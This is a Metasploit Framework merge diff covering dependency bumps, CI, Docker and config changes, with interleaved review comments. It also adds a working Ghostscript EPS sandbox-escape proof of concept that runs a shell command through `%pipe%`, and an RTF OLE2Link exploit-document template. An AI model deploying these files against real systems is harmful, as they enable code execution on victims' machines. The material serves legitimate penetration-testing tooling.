Merge branch 'master' into land-8293-multi-railgun
commit
8422a7db39
|
@ -5,6 +5,10 @@ docker-compose*.yml
|
|||
docker/
|
||||
!docker/msfconsole.rc
|
||||
README.md
|
||||
.git/
|
||||
.github/
|
||||
.ruby-version
|
||||
.ruby-gemset
|
||||
|
||||
.bundle
|
||||
Gemfile.local
|
||||
|
@ -93,3 +97,6 @@ data/meterpreter/ext_server_pivot.*.dll
|
|||
# https://rapid7.github.io/metasploit-framework. It's an orphan branch.
|
||||
/metakitty
|
||||
.vagrant
|
||||
|
||||
# no need for rspecs
|
||||
spec/
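Review bot: `.git/` is now excluded from the build context, yet the Dockerfile keeps the `git` package with the comment that `metasploit-framework.gemspec` runs a `git ls`; inside the build there is no repository for that command to query, so the gemspec's file list is presumably empty or the command fails (the gemspec itself is not visible here to say which). Either keep `.git/` in the context, or make the gemspec fall back to a plain glob when `.git` is absent and drop `git` from the runtime package list. Excluding `spec/` also means the image can never run the test suite, which matches the `--without development test coverage` bundler default in the Dockerfile; a line `# tests are not shipped in the image; run them outside docker` next to `spec/` would make that deliberate rather than accidental.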
|
||||
|
|
|
@ -88,3 +88,6 @@ data/meterpreter/ext_server_pivot.*.dll
|
|||
|
||||
# local docker compose overrides
|
||||
docker-compose.local*
|
||||
|
||||
# Ignore python bytecode
|
||||
*.pyc
|
||||
|
|
14
.travis.yml
14
.travis.yml
|
@ -16,12 +16,15 @@ rvm:
|
|||
- '2.4.1'
|
||||
|
||||
env:
|
||||
- RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true
|
||||
- RAKE_TASKS=spec SPEC_OPTS="--tag content"
|
||||
- RAKE_TASKS=spec SPEC_OPTS="--tag ~content"
|
||||
- CMD=bundle exec rake "cucumber cucumber:boot" CREATE_BINSTUBS=true
|
||||
- CMD=bundle exec rake spec SPEC_OPTS="--tag content"
|
||||
- CMD=bundle exec rake spec SPEC_OPTS="--tag ~content"
|
||||
|
||||
matrix:
|
||||
fast_finish: true
|
||||
include:
|
||||
- rvm: ruby-head
|
||||
env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build"
|
||||
before_install:
|
||||
- "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
|
||||
- rake --version
|
||||
|
@ -36,7 +39,7 @@ before_script:
|
|||
- bundle exec rake db:migrate
|
||||
script:
|
||||
# fail build if db/schema.rb update is not committed
|
||||
- git diff --exit-code db/schema.rb && bundle exec rake $RAKE_TASKS
|
||||
- git diff --exit-code db/schema.rb && $CMD
|
||||
|
||||
notifications:
|
||||
irc: "irc.freenode.org#msfnotify"
|
||||
|
@ -49,3 +52,6 @@ branches:
|
|||
except:
|
||||
- gh-pages
|
||||
- metakitty
|
||||
|
||||
services:
|
||||
- docker
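Review bot: The new `env:` entries leave the multi-word `CMD` value unquoted — `CMD=bundle exec rake spec SPEC_OPTS="--tag content"` — so whether `CMD` ends up as the whole command or just `bundle` depends on how Travis tokenises env strings; quote it explicitly: `CMD="bundle exec rake spec" SPEC_OPTS="--tag content"`, `CMD="bundle exec rake spec" SPEC_OPTS="--tag ~content"` and `CMD="bundle exec rake cucumber cucumber:boot" CREATE_BINSTUBS=true`. `$CMD` is left unquoted in `script:` on purpose so the shell word-splits it; a comment `# $CMD is intentionally unquoted: it holds a full command line` would stop someone "fixing" it to `"$CMD"`. The `ruby-head` matrix entry now runs `docker-compose build` with no `allow_failures`, so a transient ruby-head or registry problem fails the whole build under `fast_finish: true`; if it is meant as a smoke test, add it to `allow_failures`.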
|
||||
|
|
58
Gemfile.lock
58
Gemfile.lock
|
@ -1,13 +1,13 @@
|
|||
GIT
|
||||
remote: https://github.com/WinRb/rubyntlm
|
||||
revision: 7e2daf6076ba55a435d3e345498a7df40faa3d49
|
||||
revision: 38aaf1d59dd1a443e4a9c0aea2be232cfe262772
|
||||
branch: master
|
||||
specs:
|
||||
rubyntlm (0.6.1)
|
||||
rubyntlm (0.6.2)
|
||||
|
||||
GIT
|
||||
remote: https://github.com/banister/method_source
|
||||
revision: 6dcb116e37e20e58f615ffe05a40bbe9a536e44a
|
||||
revision: 0cc6cc8e15d08880585e8cb0c54e13c3cf937c54
|
||||
branch: master
|
||||
specs:
|
||||
method_source (0.8.1)
|
||||
|
@ -31,7 +31,7 @@ GIT
|
|||
PATH
|
||||
remote: .
|
||||
specs:
|
||||
metasploit-framework (4.14.15)
|
||||
metasploit-framework (4.14.17)
|
||||
actionpack (~> 4.2.6)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
|
@ -44,9 +44,9 @@ PATH
|
|||
metasploit-concern
|
||||
metasploit-credential
|
||||
metasploit-model
|
||||
metasploit-payloads (= 1.2.24)
|
||||
metasploit-payloads (= 1.2.28)
|
||||
metasploit_data_models
|
||||
metasploit_payloads-mettle (= 0.1.8)
|
||||
metasploit_payloads-mettle (= 0.1.9)
|
||||
msgpack
|
||||
nessus_rest
|
||||
net-ssh
|
||||
|
@ -56,7 +56,7 @@ PATH
|
|||
octokit
|
||||
openssl-ccm
|
||||
openvas-omp
|
||||
packetfu (= 1.1.13.pre)
|
||||
packetfu
|
||||
patch_finder
|
||||
pcaprub
|
||||
pg
|
||||
|
@ -136,7 +136,7 @@ GEM
|
|||
bcrypt (3.1.11)
|
||||
bindata (2.4.0)
|
||||
builder (3.2.3)
|
||||
capybara (2.13.0)
|
||||
capybara (2.14.0)
|
||||
addressable
|
||||
mime-types (>= 1.16)
|
||||
nokogiri (>= 1.3.3)
|
||||
|
@ -146,7 +146,7 @@ GEM
|
|||
childprocess (0.5.9)
|
||||
ffi (~> 1.0, >= 1.0.11)
|
||||
coderay (1.1.1)
|
||||
contracts (0.15.0)
|
||||
contracts (0.16.0)
|
||||
cucumber (2.4.0)
|
||||
builder (>= 2.1.2)
|
||||
cucumber-core (~> 1.5.0)
|
||||
|
@ -177,7 +177,7 @@ GEM
|
|||
ffi (1.9.18)
|
||||
filesize (0.1.1)
|
||||
fivemat (1.3.3)
|
||||
gherkin (4.1.1)
|
||||
gherkin (4.1.3)
|
||||
google-protobuf (3.2.0.2)
|
||||
googleauth (0.5.1)
|
||||
faraday (~> 0.9)
|
||||
|
@ -222,7 +222,7 @@ GEM
|
|||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-payloads (1.2.24)
|
||||
metasploit-payloads (1.2.28)
|
||||
metasploit_data_models (2.0.14)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
|
@ -233,7 +233,7 @@ GEM
|
|||
postgres_ext
|
||||
railties (~> 4.2.6)
|
||||
recog (~> 2.0)
|
||||
metasploit_payloads-mettle (0.1.8)
|
||||
metasploit_payloads-mettle (0.1.9)
|
||||
mime-types (3.1)
|
||||
mime-types-data (~> 3.2015)
|
||||
mime-types-data (3.2016.0521)
|
||||
|
@ -254,7 +254,7 @@ GEM
|
|||
openssl-ccm (1.2.1)
|
||||
openvas-omp (0.0.4)
|
||||
os (0.9.6)
|
||||
packetfu (1.1.13.pre)
|
||||
packetfu (1.1.13)
|
||||
pcaprub
|
||||
patch_finder (1.0.2)
|
||||
pcaprub (0.12.4)
|
||||
|
@ -283,7 +283,7 @@ GEM
|
|||
thor (>= 0.18.1, < 2.0)
|
||||
rake (12.0.0)
|
||||
rb-readline (0.5.4)
|
||||
recog (2.1.5)
|
||||
recog (2.1.6)
|
||||
nokogiri
|
||||
redcarpet (3.4.0)
|
||||
rex-arch (0.1.4)
|
||||
|
@ -299,7 +299,7 @@ GEM
|
|||
metasm
|
||||
rex-arch
|
||||
rex-text
|
||||
rex-exploitation (0.1.12)
|
||||
rex-exploitation (0.1.13)
|
||||
jsobfu
|
||||
metasm
|
||||
rex-arch
|
||||
|
@ -312,7 +312,7 @@ GEM
|
|||
rex-arch
|
||||
rex-ole (0.1.5)
|
||||
rex-text
|
||||
rex-powershell (0.1.70)
|
||||
rex-powershell (0.1.71)
|
||||
rex-random_identifier
|
||||
rex-text
|
||||
rex-random_identifier (0.1.2)
|
||||
|
@ -333,23 +333,23 @@ GEM
|
|||
rex-text
|
||||
rkelly-remix (0.0.7)
|
||||
robots (0.10.1)
|
||||
rspec-core (3.5.4)
|
||||
rspec-support (~> 3.5.0)
|
||||
rspec-expectations (3.5.0)
|
||||
rspec-core (3.6.0)
|
||||
rspec-support (~> 3.6.0)
|
||||
rspec-expectations (3.6.0)
|
||||
diff-lcs (>= 1.2.0, < 2.0)
|
||||
rspec-support (~> 3.5.0)
|
||||
rspec-mocks (3.5.0)
|
||||
rspec-support (~> 3.6.0)
|
||||
rspec-mocks (3.6.0)
|
||||
diff-lcs (>= 1.2.0, < 2.0)
|
||||
rspec-support (~> 3.5.0)
|
||||
rspec-rails (3.5.2)
|
||||
rspec-support (~> 3.6.0)
|
||||
rspec-rails (3.6.0)
|
||||
actionpack (>= 3.0)
|
||||
activesupport (>= 3.0)
|
||||
railties (>= 3.0)
|
||||
rspec-core (~> 3.5.0)
|
||||
rspec-expectations (~> 3.5.0)
|
||||
rspec-mocks (~> 3.5.0)
|
||||
rspec-support (~> 3.5.0)
|
||||
rspec-support (3.5.0)
|
||||
rspec-core (~> 3.6.0)
|
||||
rspec-expectations (~> 3.6.0)
|
||||
rspec-mocks (~> 3.6.0)
|
||||
rspec-support (~> 3.6.0)
|
||||
rspec-support (3.6.0)
|
||||
ruby_smb (0.0.12)
|
||||
bindata
|
||||
rubyntlm
|
||||
|
@ -383,7 +383,7 @@ GEM
|
|||
xmlrpc (0.3.0)
|
||||
xpath (2.0.0)
|
||||
nokogiri (~> 1.3)
|
||||
yard (0.9.8)
|
||||
yard (0.9.9)
|
||||
|
||||
PLATFORMS
|
||||
ruby
|
||||
|
|
48
LICENSE_GEMS
48
LICENSE_GEMS
|
@ -1,3 +1,4 @@
|
|||
This file is auto-generated by tools/dev/update_gem_licenses.sh
|
||||
actionpack, 4.2.8, MIT
|
||||
actionview, 4.2.8, MIT
|
||||
activemodel, 4.2.8, MIT
|
||||
|
@ -8,14 +9,14 @@ arel, 6.0.4, MIT
|
|||
arel-helpers, 2.3.0, unknown
|
||||
aruba, 0.14.2, MIT
|
||||
bcrypt, 3.1.11, MIT
|
||||
bindata, 2.3.5, ruby
|
||||
bindata, 2.4.0, ruby
|
||||
bit-struct, 0.15.0, ruby
|
||||
builder, 3.2.3, MIT
|
||||
bundler, 1.14.6, MIT
|
||||
capybara, 2.13.0, MIT
|
||||
capybara, 2.14.0, MIT
|
||||
childprocess, 0.5.9, MIT
|
||||
coderay, 1.1.1, MIT
|
||||
contracts, 0.15.0, "Simplified BSD"
|
||||
contracts, 0.16.0, "Simplified BSD"
|
||||
cucumber, 2.4.0, MIT
|
||||
cucumber-core, 1.5.0, MIT
|
||||
cucumber-rails, 1.4.5, MIT
|
||||
|
@ -25,31 +26,31 @@ docile, 1.1.5, MIT
|
|||
erubis, 2.7.0, MIT
|
||||
factory_girl, 4.8.0, MIT
|
||||
factory_girl_rails, 4.8.0, MIT
|
||||
faraday, 0.12.0.1, MIT
|
||||
faraday, 0.12.1, MIT
|
||||
ffi, 1.9.18, "New BSD"
|
||||
filesize, 0.1.1, MIT
|
||||
fivemat, 1.3.3, MIT
|
||||
gherkin, 4.1.1, MIT
|
||||
gherkin, 4.1.3, MIT
|
||||
google-protobuf, 3.2.0.2, "New BSD"
|
||||
googleauth, 0.5.1, "Apache 2.0"
|
||||
grpc, 1.2.2, "New BSD"
|
||||
grpc, 1.2.5, "New BSD"
|
||||
i18n, 0.8.1, MIT
|
||||
jsobfu, 0.4.2, "New BSD"
|
||||
json, 2.0.3, ruby
|
||||
json, 2.1.0, ruby
|
||||
jwt, 1.5.6, MIT
|
||||
little-plugger, 1.1.4, MIT
|
||||
logging, 2.2.0, MIT
|
||||
logging, 2.2.2, MIT
|
||||
loofah, 2.0.3, MIT
|
||||
memoist, 0.15.0, MIT
|
||||
metasm, 1.0.3, LGPL
|
||||
metasploit-aggregator, 0.1.3, "New BSD"
|
||||
metasploit-concern, 2.0.3, "New BSD"
|
||||
metasploit-credential, 2.0.8, "New BSD"
|
||||
metasploit-framework, 4.14.9, "New BSD"
|
||||
metasploit-framework, 4.14.17, "New BSD"
|
||||
metasploit-model, 2.0.3, "New BSD"
|
||||
metasploit-payloads, 1.2.19, "3-clause (or ""modified"") BSD"
|
||||
metasploit-payloads, 1.2.28, "3-clause (or ""modified"") BSD"
|
||||
metasploit_data_models, 2.0.14, "New BSD"
|
||||
metasploit_payloads-mettle, 0.1.8, "3-clause (or ""modified"") BSD"
|
||||
metasploit_payloads-mettle, 0.1.9, "3-clause (or ""modified"") BSD"
|
||||
method_source, 0.8.1, MIT
|
||||
mime-types, 3.1, MIT
|
||||
mime-types-data, 3.2016.0521, MIT
|
||||
|
@ -68,7 +69,7 @@ octokit, 4.7.0, MIT
|
|||
openssl-ccm, 1.2.1, MIT
|
||||
openvas-omp, 0.0.4, MIT
|
||||
os, 0.9.6, MIT
|
||||
packetfu, 1.1.13.pre, BSD
|
||||
packetfu, 1.1.13, BSD
|
||||
patch_finder, 1.0.2, "New BSD"
|
||||
pcaprub, 0.12.4, LGPL-2.1
|
||||
pg, 0.20.0, "New BSD"
|
||||
|
@ -84,18 +85,18 @@ rails-html-sanitizer, 1.0.3, MIT
|
|||
railties, 4.2.8, MIT
|
||||
rake, 12.0.0, MIT
|
||||
rb-readline, 0.5.4, BSD
|
||||
recog, 2.1.5, unknown
|
||||
recog, 2.1.6, unknown
|
||||
redcarpet, 3.4.0, MIT
|
||||
rex-arch, 0.1.4, "New BSD"
|
||||
rex-bin_tools, 0.1.2, "New BSD"
|
||||
rex-core, 0.1.9, "New BSD"
|
||||
rex-encoder, 0.1.3, "New BSD"
|
||||
rex-exploitation, 0.1.12, "New BSD"
|
||||
rex-exploitation, 0.1.13, "New BSD"
|
||||
rex-java, 0.1.4, "New BSD"
|
||||
rex-mime, 0.1.4, "New BSD"
|
||||
rex-nop, 0.1.0, unknown
|
||||
rex-ole, 0.1.5, "New BSD"
|
||||
rex-powershell, 0.1.70, "New BSD"
|
||||
rex-powershell, 0.1.71, "New BSD"
|
||||
rex-random_identifier, 0.1.2, "New BSD"
|
||||
rex-registry, 0.1.2, "New BSD"
|
||||
rex-rop_builder, 0.1.2, "New BSD"
|
||||
|
@ -106,13 +107,13 @@ rex-text, 0.2.14, "New BSD"
|
|||
rex-zip, 0.1.2, "New BSD"
|
||||
rkelly-remix, 0.0.7, MIT
|
||||
robots, 0.10.1, MIT
|
||||
rspec-core, 3.5.4, MIT
|
||||
rspec-expectations, 3.5.0, MIT
|
||||
rspec-mocks, 3.5.0, MIT
|
||||
rspec-rails, 3.5.2, MIT
|
||||
rspec-support, 3.5.0, MIT
|
||||
ruby_smb, 0.0.8, "New BSD"
|
||||
rubyntlm, 0.6.1, MIT
|
||||
rspec-core, 3.6.0, MIT
|
||||
rspec-expectations, 3.6.0, MIT
|
||||
rspec-mocks, 3.6.0, MIT
|
||||
rspec-rails, 3.6.0, MIT
|
||||
rspec-support, 3.6.0, MIT
|
||||
ruby_smb, 0.0.12, "New BSD"
|
||||
rubyntlm, 0.6.2, MIT
|
||||
rubyzip, 1.2.1, "Simplified BSD"
|
||||
sawyer, 0.8.1, MIT
|
||||
shoulda-matchers, 3.1.1, MIT
|
||||
|
@ -127,5 +128,6 @@ timecop, 0.8.1, MIT
|
|||
tzinfo, 1.2.3, MIT
|
||||
tzinfo-data, 1.2017.2, MIT
|
||||
windows_error, 0.1.1, BSD
|
||||
xmlrpc, 0.3.0, ruby
|
||||
xpath, 2.0.0, unknown
|
||||
yard, 0.9.8, MIT
|
||||
yard, 0.9.9, MIT
|
||||
|
|
|
@ -0,0 +1,101 @@
|
|||
%!PS-Adobe-3.0 EPSF-3.0
|
||||
%%BoundingBox: -0 -0 100 100
|
||||
|
||||
|
||||
/size_from 10000 def
|
||||
/size_step 500 def
|
||||
/size_to 65000 def
|
||||
/enlarge 1000 def
|
||||
|
||||
%/bigarr 65000 array def
|
||||
|
||||
0
|
||||
size_from size_step size_to {
|
||||
pop
|
||||
1 add
|
||||
} for
|
||||
|
||||
/buffercount exch def
|
||||
|
||||
/buffersizes buffercount array def
|
||||
|
||||
|
||||
0
|
||||
size_from size_step size_to {
|
||||
buffersizes exch 2 index exch put
|
||||
1 add
|
||||
} for
|
||||
pop
|
||||
|
||||
/buffers buffercount array def
|
||||
|
||||
0 1 buffercount 1 sub {
|
||||
/ind exch def
|
||||
buffersizes ind get /cursize exch def
|
||||
cursize string /curbuf exch def
|
||||
buffers ind curbuf put
|
||||
cursize 16 sub 1 cursize 1 sub {
|
||||
curbuf exch 255 put
|
||||
} for
|
||||
} for
|
||||
|
||||
|
||||
/buffersearchvars [0 0 0 0 0] def
|
||||
/sdevice [0] def
|
||||
|
||||
enlarge array aload
|
||||
|
||||
{
|
||||
.eqproc
|
||||
buffersearchvars 0 buffersearchvars 0 get 1 add put
|
||||
buffersearchvars 1 0 put
|
||||
buffersearchvars 2 0 put
|
||||
buffercount {
|
||||
buffers buffersearchvars 1 get get
|
||||
buffersizes buffersearchvars 1 get get
|
||||
16 sub get
|
||||
254 le {
|
||||
buffersearchvars 2 1 put
|
||||
buffersearchvars 3 buffers buffersearchvars 1 get get put
|
||||
buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
|
||||
} if
|
||||
buffersearchvars 1 buffersearchvars 1 get 1 add put
|
||||
} repeat
|
||||
|
||||
buffersearchvars 2 get 1 ge {
|
||||
exit
|
||||
} if
|
||||
%(.) print
|
||||
} loop
|
||||
|
||||
.eqproc
|
||||
.eqproc
|
||||
.eqproc
|
||||
sdevice 0
|
||||
currentdevice
|
||||
buffersearchvars 3 get buffersearchvars 4 get 16#7e put
|
||||
buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
|
||||
buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
|
||||
put
|
||||
|
||||
|
||||
buffersearchvars 0 get array aload
|
||||
|
||||
sdevice 0 get
|
||||
16#3e8 0 put
|
||||
|
||||
sdevice 0 get
|
||||
16#3b0 0 put
|
||||
|
||||
sdevice 0 get
|
||||
16#3f0 0 put
|
||||
|
||||
|
||||
currentdevice null false mark /OutputFile (%pipe%echo vulnerable > /dev/tty)
|
||||
.putdeviceparams
|
||||
1 true .outputpage
|
||||
.rsdparams
|
||||
%{ } loop
|
||||
0 0 .quit
|
||||
%asdf
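Review bot: This new EPS fixture has no leading comment saying what it is or where it is used, and its payload is live: `currentdevice null false mark /OutputFile (%pipe%echo vulnerable > /dev/tty) .putdeviceparams` runs a shell command on any Ghostscript that still honours `%pipe%` after the `.eqproc`/`.rsdparams` sequence (this reads like a -dSAFER bypass PoC, but that is inferred from the operators, not stated in the file). Add a header after the `%%BoundingBox` line, e.g. `% Ghostscript %pipe% sandbox-escape PoC: writes 'vulnerable' to /dev/tty when rendered. Fixture only - do not open with an unpatched gs or a file manager that thumbnails EPS.` The `size_from`/`size_step`/`size_to`/`enlarge` values and the `16#3e8`/`16#3b0`/`16#3f0` offsets written into `sdevice` are also undocumented; they look like heap-grooming parameters and device-structure offsets, and a one-line comment on each saying what they target would help whoever has to retune them for another build.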
|
||||
|
|
@ -0,0 +1,33 @@
|
|||
{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0
|
||||
{\info
|
||||
{\author Microsoft}
|
||||
{\operator Microsoft}
|
||||
}
|
||||
{\*\xmlnstbl {\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}
|
||||
{
|
||||
{\object\objautlink\objupdate\rsltpict\objw291\objh230\objscalex99\objscaley101
|
||||
{\*\objclass Word.Document.8}
|
||||
{\*\objdata 0105000002000000
|
||||
090000004f4c45324c696e6b000000000000000000000a0000
|
||||
d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d
|
||||
6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
|
||||
000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
|
||||
0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
|
||||
00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||
MINISTREAM_DATA
|
||||
0105000000000000}
|
||||
{\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324 }}}}
|
||||
{\*\datastore }
|
||||
}
|
|
@ -1,6 +1,6 @@
|
|||
version: '2'
|
||||
services:
|
||||
ms: &ms
|
||||
ms:
|
||||
image: metasploit
|
||||
build:
|
||||
context: .
|
||||
|
@ -12,7 +12,7 @@ services:
|
|||
ports:
|
||||
- 4444:4444
|
||||
volumes:
|
||||
- $HOME/.msf4:/root/.msf4
|
||||
- $HOME/.msf4:/home/msf/.msf4
|
||||
|
||||
db:
|
||||
image: postgres:9.6
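Review bot: The bind mount `$HOME/.msf4:/home/msf/.msf4` now lands in the home of the unprivileged `msf` user created by `adduser -D` in the Dockerfile, whose UID is whatever busybox assigned at build time (presumably 1000 on a fresh Alpine image); if the host `~/.msf4` is owned by a different UID, msfconsole cannot write its history, logs or `database.yml` there and the mount silently breaks persistence. Either document that requirement, or pin the UID in the image (`adduser -u 1000 ...`) and note it beside the volume: `# written as uid 1000 (user msf) inside the container`. Dropping the `&ms` anchor is fine as long as no other compose file still merges `<<: *ms`; that cannot be checked from this section.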
|
||||
|
|
|
@ -1,8 +1,9 @@
|
|||
FROM ruby:2.3-alpine
|
||||
MAINTAINER Rapid7
|
||||
|
||||
ARG BUNDLER_ARGS="--system --jobs=8"
|
||||
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
|
||||
ENV APP_HOME /usr/src/metasploit-framework/
|
||||
ENV MSF_USER msf
|
||||
WORKDIR $APP_HOME
|
||||
|
||||
COPY Gemfile* m* Rakefile $APP_HOME
|
||||
|
@ -10,19 +11,16 @@ COPY lib $APP_HOME/lib
|
|||
|
||||
RUN apk update && \
|
||||
apk add \
|
||||
ruby-bigdecimal \
|
||||
ruby-bundler \
|
||||
ruby-io-console \
|
||||
sqlite-libs \
|
||||
nmap \
|
||||
postgresql-libs \
|
||||
# needed as long as metasploit-framework.gemspec contains a 'git ls'
|
||||
git \
|
||||
ncurses \
|
||||
libcap \
|
||||
&& apk add --virtual .ruby-builddeps \
|
||||
autoconf \
|
||||
bison \
|
||||
subversion \
|
||||
git \
|
||||
sqlite \
|
||||
nmap \
|
||||
libxslt \
|
||||
postgresql \
|
||||
ncurses \
|
||||
&& apk add --virtual .ruby-builddeps \
|
||||
build-base \
|
||||
ruby-dev \
|
||||
libffi-dev\
|
||||
|
@ -36,12 +34,21 @@ RUN apk update && \
|
|||
yaml-dev \
|
||||
zlib-dev \
|
||||
ncurses-dev \
|
||||
bison \
|
||||
autoconf \
|
||||
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
|
||||
&& bundle install $BUNDLER_ARGS \
|
||||
&& bundle install --system $BUNDLER_ARGS \
|
||||
&& apk del .ruby-builddeps \
|
||||
&& rm -rf /var/cache/apk/*
|
||||
|
||||
# fix for robots gem not readable (known bug)
|
||||
# https://github.com/rapid7/metasploit-framework/issues/6068
|
||||
RUN chmod o+r /usr/local/bundle/gems/robots-*/lib/robots.rb
|
||||
|
||||
RUN adduser -g msfconsole -D $MSF_USER
|
||||
|
||||
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
|
||||
|
||||
USER $MSF_USER
|
||||
|
||||
ADD ./ $APP_HOME
|
||||
|
||||
CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]
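Review bot: `RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)` is undocumented and broader than it looks: the file capability attaches to the interpreter, so every ruby process in the image — rake, any gem binstub, a ruby spawned by a module — gets raw-socket and privileged-port capability, not just msfconsole. Add a comment such as `# msf runs unprivileged; pcaprub/nmap raw sockets and listeners on ports <1024 need these caps on the ruby binary itself` so the next reader neither removes it nor widens it. `ADD ./ $APP_HOME` after `USER $MSF_USER` still writes root-owned files (ADD/COPY do not honour USER), so the framework tree is read-only for msf — probably what you want, but worth stating, and `COPY ./ $APP_HOME` is the safer verb since ADD's automatic tar extraction and URL fetching are not needed here. Note also that `setcap` runs after `apk del .ruby-builddeps`, so `libcap` must stay in the runtime package list (it does); a comment tying the two lines together would prevent it being "cleaned up" later.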
|
||||
|
|
|
@ -1,7 +1,11 @@
|
|||
version: '2'
|
||||
|
||||
services:
|
||||
ms: &ms
|
||||
ms:
|
||||
build:
|
||||
args:
|
||||
BUNDLER_ARGS: --jobs=8
|
||||
image: metasploit:dev
|
||||
environment:
|
||||
DATABASE_URL: postgres://postgres@db:5432/msf_dev
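Review bot: `DATABASE_URL: postgres://postgres@db:5432/msf_dev` connects as the `postgres` superuser with no password; that only works if the `db` service accepts passwordless connections (the official image does when `POSTGRES_PASSWORD` is unset), which means anything that can reach the `db` container gets superuser access — whether this line is new or pre-existing is not recoverable from the rendered hunk. For a local dev override that is tolerable, but set `POSTGRES_PASSWORD` on the `db` service and carry it here — `DATABASE_URL: postgres://postgres:${MSF_DB_PASSWORD}@db:5432/msf_dev` — or at least add `# db must never publish 5432 on the host: no password is set` beside it. `BUNDLER_ARGS: --jobs=8` deliberately re-includes the development/test groups that the Dockerfile default excludes; a one-line comment saying so would help.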
|
||||
|
||||
|
|
|
@ -1,5 +1,10 @@
|
|||
<ruby>
|
||||
run_single("setg LHOST #{ENV['LHOST']}") if ENV['LHOST']
|
||||
run_single("setg LPORT #{ENV['LPORT']}") if ENV['LPORT']
|
||||
if ENV['LHOST']
|
||||
lhost = ENV['LHOST']
|
||||
else
|
||||
lhost = %x(hostname -i)
|
||||
end
|
||||
run_single("setg LHOST #{lhost}")
|
||||
run_single("db_connect #{ENV['DATABASE_URL'].gsub('postrgres://', '')}") if ENV['DATABASE_URL']
|
||||
</ruby>
